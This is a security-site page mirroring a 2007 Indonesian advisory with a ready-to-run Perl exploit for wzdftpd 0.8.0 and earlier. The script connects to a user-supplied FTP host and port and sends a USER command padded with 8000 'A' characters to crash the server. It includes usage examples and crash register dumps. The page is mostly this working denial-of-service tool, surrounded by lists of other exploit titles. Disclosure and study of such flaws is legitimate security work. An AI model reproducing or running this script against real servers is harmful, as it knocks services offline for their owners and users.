首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
wzdftpd <= 0.8.0 (USER) Remote Denial of Service Exploit
来源:http://www.wzdftpd.net 作者:k1tk4t 发布时间:2007-10-08  
# Indonesian Newhack Security Advisory
# ------------------------------------
# wzdftpd <= 0.8.0 (USER) Remote Danial of Service
# Waktu            :  Oct 07 2007 05:00AM
# Software        :  wzdftpd 0.8.0
# Version        :  0.8.0 Linux and Windows
# Vendor        :  http://www.wzdftpd.net/
# Ditemukan oleh    :  k1tk4t  |  http://newhack.org
# Lokasi        :  Indonesia
#
# Tested on Windows XP SP2 and Linux CentOS
#
# C0000005 (ACCESS VIOLATION)
#
# EAX 00000001
# ECX 00A2F410
# EDX 003E0608
# EBX 00000000
# ESP 00FDEB58
# EBP 00FDFFEC
# ESI 00A25118
# EDI 00000094
#
#
#
#  Terima Kasih untuk;
#  str0ke, DNX, xoron
#  -[opt1lc, fl3xu5, ghoz]-
#  nyubi,iFX,kin9k0ng,bius,selikoer,aldy_BT,NoGe
#  Komunitas Security dan Hacker Indonesia
#
#!/usr/bin/perl
use IO::Socket;

print "\n  |-------------------------------------------------|";
print "\n  |         Indonesian Newhack Technology           |";
print "\n  |-------------------------------------------------|";
print "\n  |  wzdftpd 0.8.0 (USER) Remote Danial of Service  |";
print "\n  |     Found by k1tk4t [k1tk4t(at)newhack.org]     |";
print "\n  |-------------------------------------------------|";
print "\n  |";

if (@ARGV < 2)
{
print "\n[!] Penggunaan: perl wzdftpd0.8.0.pl [Host] [Port] ";
print "\n[!] Contoh: perl wzdftpd0.8.0.pl 127.0.0.1 21";
exit;
}


$ip = $ARGV[0];
$port = $ARGV[1];

$exploit = "A" x 8000;

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Koneksi: Gagal!\n";
print "\n[+] Koneksi: Ok!\n";
print "[+] Menggirim Packet DoS...\n";

print $socket "USER $exploit\n";
sleep(5);
close($socket);

print "[?] Mati Sudah!\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CMS Creamotion (securite.php)
·PHP Homepage M 1.0 galerie.php
·ELSE IF CMS 0.6 Multiple Remot
·LightBlog 8.4.1.1 Remote Code
·MDPro 1.0.76 Remote SQL Inject
·Microsoft Visual FoxPro 6.0 FP
·Tor < 0.1.2.16 ControlPort Rem
·Zomplog <= 3.8.1 upload_files.
·cpDynaLinks 1.02 category.php
·Linux Kernel 2.4/2.6 x86-64 Sy
·Php-Stats 0.1.9.2 Multiple Vul
·Eggdrop Server Module Message
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved